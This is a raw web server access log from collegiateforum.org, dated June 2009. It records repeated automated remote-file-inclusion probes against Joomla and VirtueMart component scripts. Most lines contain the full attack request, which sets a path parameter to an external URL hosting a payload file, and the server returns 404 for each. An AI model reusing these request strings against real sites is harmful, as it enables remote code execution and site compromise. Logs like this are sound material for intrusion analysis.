83.13.191.186 - - [28/Jun/2009:23:39:46 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:23:39:46 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:39:47 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:39:47 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:39:47 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:39:47 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:39:47 -0700] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:39:48 -0700] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
124.0.139.129 - - [28/Jun/2009:23:40:02 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
124.0.139.129 - - [28/Jun/2009:23:40:05 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
79.49.190.214 - - [28/Jun/2009:23:40:45 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.psb-fenster-und-tueren.de/aidie1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
79.49.190.214 - - [28/Jun/2009:23:40:48 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.psb-fenster-und-tueren.de/aidie1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
79.49.190.214 - - [28/Jun/2009:23:40:48 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.psb-fenster-und-tueren.de/aidie1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
79.49.190.214 - - [28/Jun/2009:23:40:52 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.psb-fenster-und-tueren.de/aidie1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
79.49.190.214 - - [28/Jun/2009:23:40:52 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.psb-fenster-und-tueren.de/aidie1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
79.49.190.214 - - [28/Jun/2009:23:40:52 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.psb-fenster-und-tueren.de/aidie1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:23:41:42 -0700] "GET /store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:23:41:42 -0700] "GET /logs//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:23:41:42 -0700] "GET /logs/access.log%20%20//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:23:41:43 -0700] "GET /store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:23:41:43 -0700] "GET /logs//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:23:41:43 -0700] "GET /logs/access.log%20%20//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:23:41:54 -0700] "GET /components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:23:41:54 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:23:41:54 -0700] "GET /logs//components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:23:42:05 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:23:42:05 -0700] "GET /components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:23:42:05 -0700] "GET /logs//components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:23:45:05 -0700] "GET /logs/access.log//components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:23:45:05 -0700] "GET /logs//components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:23:45:05 -0700] "GET /components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:23:45:08 -0700] "GET /logs/access.log//components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:23:45:09 -0700] "GET /logs/access.log//components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:23:45:09 -0700] "GET /components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:23:45:09 -0700] "GET /logs//components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
212.241.249.222 - - [28/Jun/2009:23:47:44 -0700] "GET /components/com_sef/sef.php?mosConfig_absolute_path=http://www.ssp3.ilawa.pl/images/zoom/.bjc/logs/uk1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:49:39 -0700] "GET /administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:49:44 -0700] "GET /administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:49:44 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:49:44 -0700] "GET /logs/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:49:44 -0700] "GET /logs/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:49:44 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
124.138.156.3 - - [28/Jun/2009:23:50:26 -0700] "GET /logs//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
124.138.156.3 - - [28/Jun/2009:23:50:27 -0700] "GET /logs/access.log//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
124.138.156.3 - - [28/Jun/2009:23:50:27 -0700] "GET /store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
212.241.249.222 - - [28/Jun/2009:23:51:07 -0700] "GET /components/com_sef/sef.php?mosConfig_absolute_path=http://www.ssp3.ilawa.pl/images/zoom/.bjc/logs/uk1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:53:13 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:53:14 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:53:14 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:53:15 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:53:15 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:53:15 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:53:27 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:53:27 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:53:30 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:53:30 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:53:31 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:53:46 -0700] "GET /administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:53:50 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:53:50 -0700] "GET /logs/administrator/components/com_virtuemart/classes/shipping/usps.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:54:33 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:54:33 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:54:33 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:23:57:09 -0700] "GET /postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:23:57:11 -0700] "GET /logs/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:23:57:12 -0700] "GET /logs/access.log/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:23:57:41 -0700] "GET /postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:23:57:42 -0700] "GET /logs/access.log/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:23:57:42 -0700] "GET /logs/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [28/Jun/2009:23:58:22 -0700] "GET /logs/access.log//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [29/Jun/2009:00:02:23 -0700] "GET /postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [29/Jun/2009:00:02:24 -0700] "GET /logs/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [29/Jun/2009:00:02:25 -0700] "GET /logs/access.log%20%20/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [29/Jun/2009:00:05:27 -0700] "GET /logs/access.log/postscript/postscript.php?p_mode=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:00:07:20 -0700] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:00:07:20 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:00:07:20 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:00:07:21 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:00:07:21 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:00:07:21 -0700] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
94.23.2.21 - - [29/Jun/2009:00:15:10 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
94.23.2.21 - - [29/Jun/2009:00:15:10 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
94.23.2.21 - - [29/Jun/2009:00:15:10 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
60.43.229.5 - - [29/Jun/2009:00:16:23 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
60.43.229.5 - - [29/Jun/2009:00:16:23 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
60.43.229.5 - - [29/Jun/2009:00:16:24 -0700] "GET /logs/access.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:00:17:16 -0700] "GET /administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:00:17:16 -0700] "GET /logs//administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:00:17:16 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:00:17:16 -0700] "GET /administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
65.55.210.232 - - [29/Jun/2009:00:17:18 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
65.55.210.232 - - [29/Jun/2009:00:17:18 -0700] "GET /?D=D HTTP/1.1" 200 934 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:00:17:20 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:00:17:20 -0700] "GET /logs//administrator/components/com_virtuemart/classes/currency/convertECB.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:00:17:53 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:00:19:35 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [29/Jun/2009:00:20:21 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
195.34.78.110 - - [29/Jun/2009:00:20:22 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
